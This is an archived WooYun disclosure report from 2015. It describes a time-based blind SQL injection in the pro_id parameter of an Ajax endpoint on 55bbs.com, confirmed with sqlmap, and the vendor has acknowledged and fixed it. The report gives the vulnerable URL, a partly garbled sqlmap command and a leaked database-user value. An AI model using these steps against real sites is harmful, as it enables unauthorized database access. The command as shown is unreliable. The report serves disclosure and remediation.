缺陷编号:WooYun-2015-0125256
漏洞标题:我爱购物网某站一处隐蔽的sql注入(时间盲注)
相关厂商:55bbs.com
漏洞作者:Y4ngshu
提交时间:2015-07-08 09:16
公开时间:2015-08-22 12:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开
挖挖挖挖,撸撸撸,发现一枚上报一枚,没有分开刷请原谅\我爱wooyun,求首页啊,冲个实习帽子,么么哒
问题站点
1 |
http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro_id=5 |
注入点:pro_idajax传输数据的时候没有过滤好,手工测试,发现盲注一枚
紧接着丢进sqlmap,判断正确,确实存在注入
数据库用户
1 |
current_user:[email protected]% |
有3个数据库
55baby这个数据命名有点逗 需要加然后""引起来才能跑数据
1 |
sqlmap -u "http://baby.55bbs.com/index.php?c=Ajax&a=AjaxProInfo&pro`55baby`" |
没有深入去看有多少数据,仅仅验证性的截图证明
已证明
表面上的数据交互我们或许处理的很好,但是一定不要忘记别有用心的人们会找到系统任何一个传输数据并且没有过滤的地方,希望厂商多多排查,//我爱wooyun实习白帽我来了
危害等级:中
漏洞Rank:10
确认时间:2015-07-08 12:53
漏洞已修复,感谢!
暂无
大哥你用的这个插件叫什么?
看你发了两个这样的漏洞,这样的注入点是这么发现的呢?能给讲讲吗?
原文连接
的情况下转载,若非则不得使用我方内容。